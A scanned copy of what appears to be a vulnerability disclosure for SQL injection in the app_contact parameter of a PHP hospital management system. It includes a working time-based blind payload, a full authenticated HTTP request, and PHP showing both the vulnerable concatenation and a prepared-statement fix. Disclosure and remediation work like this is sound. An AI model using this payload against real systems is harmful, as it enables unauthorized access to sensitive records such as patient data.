urlscan Public Scan: purring-climb-52a.notion.site (2606:4700:4400::ac40:9bf7)
Submitted URL: https://www.notion.so/SQL-Injection-vulnerability-in-app_contact-parameter-on-appsearch-php-directory-2e3daa8975164ee1...
Effective URL: https://purring-climb-52a.notion.site/SQL-Injection-vulnerability-in-app_contact-parameter-on-appsearch-php-directory-2e3daa8975164ee1...
Submission: On October 05 via api from IE — Scanned from US
SQL Injection vulnerability in app_contact parameter on /appsearch.php directory.

DESCRIPTION
SQL injection vulnerability in kishan0725 Hospital Management System through commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd (March 21, 2021) allows attackers to execute arbitrary SQL commands via the app_contact parameter of /appsearch.php.

HOW TO EXPLOIT
URL: http://localhost/Hospital-Management-System/appsearch.php
Parameter: app_contact
Payload: '%2b(select*from(select(sleep(20)))a)%2b'

The %2b decodes to +. The leading single quote closes the string literal the application builds around app_contact, and the subquery forces MySQL to evaluate sleep(20) while computing the resulting expression, so a response delayed by roughly 20 seconds (compared with a baseline request using a harmless value) confirms time-based blind SQL injection without any data being returned in the page.

HTTP REQUEST:
```http
POST /Hospital/appsearch.php HTTP/1.1
Host: 192.168.7.105:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://192.168.7.105:8080
Connection: close
Referer: http://192.168.7.105:8080/Hospital/admin-panel1.php
Cookie: PHPSESSID=rllrv34sf52l6ff6p36ahq7eki
Upgrade-Insecure-Requests: 1

app_contact=Test'%2b(select*from(select(sleep(20)))a)%2b'&app_search_submit=Search
```
If the injection succeeds, the server sleeps for 20 seconds before responding. Note that the request is sent from an authenticated admin session (Referer admin-panel1.php, PHPSESSID cookie), and that the Content-Length shown (41) does not match the 82-byte body; a client replaying this request must recompute it.

SCREENSHOT FOR POC:
(screenshot not captured in this scan)

GITHUB PERMALINK
https://github.com/kishan0725/Hospital-Management-System/blob/4770d740f2512693ef8fd9aa10a8d17f79fad9bd/appsearch.php#L16

IMPACT FOR THIS VULNERABILITY:
- Exposes sensitive company data: using SQL injection, attackers can retrieve and alter data, which risks exposing sensitive data stored on the SQL server.
- Compromises users' privacy: depending on the data stored on the SQL server, an attack can expose private user data, such as patient records or credit card numbers.
HOW TO FIX THIS VULNERABILITY:
The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. Escaping or filtering the input is not a substitute: only binding the value keeps it out of the query text entirely.
Reference: PortSwigger.
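The following PHP is an added example written for this page; it is not code from kishan0725/Hospital-Management-System and does not reproduce the query at appsearch.php#L16. It assumes the search builds its SQL by string concatenation around app_contact, and the table name `appointment` and the `LIKE` pattern are assumptions for illustration. The first function shows how the page's payload turns into the sleeping query described under HOW TO EXPLOIT; the second shows the mysqli prepared-statement fix described under HOW TO FIX.

```php
<?php
// Added example (not the project's code). Assumptions: the search query is built
// by string concatenation, the table is named "appointment", and the match is a
// LIKE against app_contact.
declare(strict_types=1);

// Vulnerable pattern: user input spliced into the SQL text.
function buildVulnerableQuery(string $appContact): string
{
    return "SELECT * FROM appointment WHERE app_contact LIKE '%" . $appContact . "%'";
}

// The page's payload after URL decoding (%2b -> +). There are no literal '+'
// characters in the encoded form, so urldecode() does not turn anything into spaces.
$payload = urldecode("Test'%2b(select*from(select(sleep(20)))a)%2b'");

echo buildVulnerableQuery($payload), PHP_EOL;
// SELECT * FROM appointment WHERE app_contact LIKE '%Test'+(select*from(select(sleep(20)))a)+'%'
// The quote after "Test" closes the literal. MySQL then evaluates
// '%Test' + (subquery) + '%' as arithmetic, which runs SLEEP(20) once, so the
// response arrives about 20 seconds late: time-based blind injection.

// Fixed pattern: the query structure is sent first, the value is bound second.
// Requires a live mysqli connection (assumed). The wildcard is added to the
// bound value, never to the SQL text.
function searchByContact(mysqli $db, string $appContact): array
{
    $stmt = $db->prepare("SELECT * FROM appointment WHERE app_contact LIKE ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $pattern = '%' . $appContact . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// With the same payload, the bound value is matched literally: the database looks
// for a contact containing the text Test'+(select*from(select(sleep(20)))a)+' and
// executes no SQL from it, so the request returns immediately with no rows.
```

One caveat on the fixed version: binding stops injection, but `%` and `_` inside the bound value still act as LIKE wildcards. That is not a code-execution problem, only an over-broad search; if exact wildcard handling matters, escape those two characters in `$appContact` before building `$pattern`. Also, the only thing worth measuring when re-testing after the fix is response time against a baseline request, since a successful payload returns the same page body as a harmless value.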